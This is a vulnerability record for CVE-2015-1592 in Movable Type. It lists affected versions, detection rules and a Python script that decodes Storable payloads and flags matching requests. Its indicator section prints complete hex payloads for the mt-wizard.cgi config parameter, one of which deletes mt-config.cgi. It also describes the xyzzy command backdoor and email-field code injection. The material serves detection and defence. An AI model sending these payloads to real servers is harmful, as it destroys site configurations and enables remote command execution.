CVE-2015-1592
published 2015-02-19


Priority: P2 (71, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 75.03% (99.4th percentile)
Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.

Affected (3 ranges)

Vendor    Product        Version range        Fixed in
debian    debian_linux   (not specified)      (not specified)
sixapart  movable_type   >= 5.2.0, < 5.2.12   5.2.12
sixapart  movable_type   >= 6.0, < 6.0.7      6.0.7

Detection & IOCs (extracted from sources)

Paths:
  /cgi-bin/mt/mt-wizard.cgi
  mt-wizard.cgi
  mt.cgi
Filename:
  mt-config.cgi
Request pattern:
  __mode=retry&step=configure&config=<serialized_storable_payload>
Payload bytes (hex, as carried in the config parameter; all three begin with the SERG prefix 53455247 and an 8-byte header, after which the serialized body starts):
  vulnerability check: a Storable hash whose single value is a hook object of class XXXCHECKXXX, so thaw() tries to load XXXCHECKXXX.pm from @INC
  53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078
  destructive payload: a Storable array holding a CGITempFile object whose value is the string mt-config.cgi; CGITempFile unlinks that path when the object is destroyed
  534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769
  configuration step: not a Storable blob (no Storable version bytes after the header); decodes to a hash with the single key set_static_file_to and the value /
  5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f
  • Detect GET requests to mt-wizard.cgi carrying __mode=retry, step=configure and a config parameter whose value begins with 53455247, the hex encoding of SERG; this is the delivery vector for the serialized Storable payload. SERG is the prefix Movable Type's serializer puts in front of the serialized body, not Storable's own magic: the Storable blob begins after the 8-byte header that follows it.
  • Alert on HTTP responses containing the string "Can't locate XXXCHECKXXX.pm": Storable::thaw met a hook record naming that class and tried to require it from @INC, so the server deserialized attacker-supplied data and is vulnerable; the request was an attacker's active check for CVE-2015-1592.
  • Monitor for GET requests to mt-wizard.cgi with __mode=next_step and step=optional whose email_address_main parameter contains newline-separated Perl code (ObjectDriver injection).
  • Detect GET requests to mt.cgi with an xyzzy query parameter: the destructive exploit path writes a backdoor into the corrupted mt-config.cgi that executes commands taken from this parameter.
  • Flag any request to a Movable Type CGI endpoint whose config parameter hex-decodes to a blob starting with SERG followed by null bytes; that is the serializer header preceding the Storable data used by the exploit.
  • The nondestructive exploit payload hex-encodes a Storable object referencing Object::MultiType, DateTime and Try::Tiny::ScopeGuard and calls MT::run_app; look for these class names in decoded config values.
  • The destructive exploit path deletes mt-config.cgi through a Storable-injected CGITempFile object (the class unlinks its file when the object is destroyed); monitor for unexpected deletion or modification of mt-config.cgi on the server filesystem.
  • The nondestructive path requires the Object::MultiType and DateTime Perl modules to be installed in @INC on the target; if they are absent the exploit fails silently without corrupting the installation.
  • The destructive path needs only Movable Type's standard dependencies (the CGI module) but corrupts the installation by unlinking and rewriting mt-config.cgi.
  • Affected versions are Movable Type Pro, Open Source and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7; 5.2.12 and 6.0.7 are the fixed releases.
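The following is an added example, not code from the original page, from Six Apart, or from any exploit or detection tool. It decodes the three hex payloads listed above (hex-decode, check the SERG prefix, walk the Storable records to pull out the class names that thaw() would bless into or try to load) and applies the request-side rules from the list to log lines. Assumptions: log lines have the form METHOD /path?query; the serialized body is taken to start at offset 12, with the 8 bytes after SERG reported as a header field (inferred from the three sample blobs, not from Movable Type's source); only the Storable records those blobs use are walked (scalars, arrays, hashes, references, SX_BLESS and plain SX_HOOK), and anything else raises; the rule names serialized-config, objectdriver-injection and xyzzy-backdoor are mine.

```python
"""CVE-2015-1592 IOC helpers: decode the hex 'config' payloads and apply the request-side rules.
Added example, not code from the original page, from Six Apart, or from any exploit or detection tool."""
import re
import struct
from urllib.parse import parse_qs, urlsplit

SERG = b"SERG"  # prefix Movable Type's serializer puts in front of the serialized body
# Storable record tags and SX_HOOK flag bits (names as in Storable.xs); only this subset is walked.
SX_LSCALAR, SX_ARRAY, SX_HASH, SX_REF, SX_SCALAR, SX_BLESS, SX_HOOK = 1, 2, 3, 4, 10, 17, 19
SHF_LARGE_CLASSLEN, SHF_LARGE_STRLEN, SHF_IDX_CLASSNAME, SHF_NEED_RECURSE, SHF_HAS_LIST = 4, 8, 0x20, 0x40, 0x80
# The three payload blobs listed on this page, hex-encoded as they travel in the 'config' parameter.
CHECK_HEX = "53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078"
DELETE_HEX = "534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769"
STATIC_HEX = "5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f"


class StorableScanner:
    """Walks a Storable freeze()/nfreeze() blob, recording every class thaw() would bless into or require."""

    def __init__(self, blob):
        self.b, self.pos, self.classes = blob, 2, []           # bytes 0/1: format major/minor
        if blob[0] & 1:                                          # nfreeze(): network byte order
            self.int_fmt = ">I"
        else:                                                    # freeze(): byte order from header
            self.int_fmt = "<I" if self.read(self.u8()).startswith(b"1234") else ">I"
            self.pos += 4                                        # sizeof int, long, ptr, NV

    def read(self, n):
        self.pos += n
        return self.b[self.pos - n:self.pos]

    def u8(self):
        return self.read(1)[0]

    def i32(self):
        return struct.unpack(self.int_fmt, self.read(4))[0]

    def value(self):
        tag = self.u8()
        if tag == SX_REF:
            return ("ref", self.value())
        if tag in (SX_SCALAR, SX_LSCALAR):
            return self.read(self.u8() if tag == SX_SCALAR else self.i32())
        if tag == SX_ARRAY:
            return [self.value() for _ in range(self.i32())]
        if tag == SX_HASH:                                       # per entry: value, key length, key
            out = {}
            for _ in range(self.i32()):
                v = self.value()
                out[self.read(self.i32())] = v
            return out
        if tag == SX_BLESS:                                      # 0x80 marks a 4-byte class length
            n = self.u8()
            cls = self.read(self.i32() if n & 0x80 else n).decode("latin-1")
            self.classes.append(cls)
            return ("bless", cls, self.value())                  # the object being blessed follows
        if tag == SX_HOOK:                                       # thaw() requires cls, calls STORABLE_thaw
            flags = self.u8()
            if flags & (SHF_NEED_RECURSE | SHF_IDX_CLASSNAME | SHF_HAS_LIST) or flags & 3 == 3:
                raise ValueError("SX_HOOK variant not handled")
            cls = self.read(self.i32() if flags & SHF_LARGE_CLASSLEN else self.u8()).decode("latin-1")
            self.classes.append(cls)
            return ("hook", cls, self.read(self.i32() if flags & SHF_LARGE_STRLEN else self.u8()))
        raise ValueError("unsupported Storable tag %d" % tag)


def decode_config(hex_value):
    """Hex-decode a 'config' value: None unless it carries SERG, else header field, classes, strings."""
    if not re.fullmatch(r"(?:[0-9a-fA-F]{2}){13,}", hex_value) or not hex_value.lower().startswith(SERG.hex()):
        return None
    raw = bytes.fromhex(hex_value)
    body = raw[12:]   # assumption from the sample blobs, not MT's source: 8-byte field, then the body
    info = {"header": int.from_bytes(raw[4:12], "big"), "classes": [],
            "strings": [s.decode("latin-1") for s in re.findall(rb"[\x20-\x7e]{4,}", body)]}
    if body[0] >> 1 == 2:                                        # Storable binary format major 2
        scanner = StorableScanner(body)
        try:
            scanner.value()
        except (ValueError, IndexError, struct.error):
            pass                                                 # truncated/unsupported: keep what was seen
        info["classes"] = scanner.classes
    return info


def check_request(line):
    """Request-side IOC rules for one 'METHOD /path?query' line; returns a list of (rule, detail)."""
    url = urlsplit(line.partition(" ")[2])
    script = url.path.rsplit("/", 1)[-1]
    q = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    hits = []
    if script == "mt-wizard.cgi" and (q.get("__mode"), q.get("step")) == ("retry", "configure"):
        info = decode_config(q.get("config", ""))
        if info is not None:
            hits.append(("serialized-config", info))
    if script == "mt-wizard.cgi" and (q.get("__mode"), q.get("step")) == ("next_step", "optional"):
        if "\n" in q.get("email_address_main", ""):           # newline starts an injected ObjectDriver line
            hits.append(("objectdriver-injection", q["email_address_main"]))
    if script == "mt.cgi" and "xyzzy" in q:
        hits.append(("xyzzy-backdoor", q["xyzzy"]))
    return hits
```

decode_config returns None for anything that is not a SERG-prefixed hex blob, so the first rule fires only on serialized payloads and not on ordinary wizard traffic; on the three blobs above it reports the classes XXXCHECKXXX and CGITempFile for the two Storable payloads and no class (just the key set_static_file_to) for the third. The response-side rule from the list is a plain substring match on "Can't locate XXXCHECKXXX.pm" and belongs in whatever layer sees response bodies.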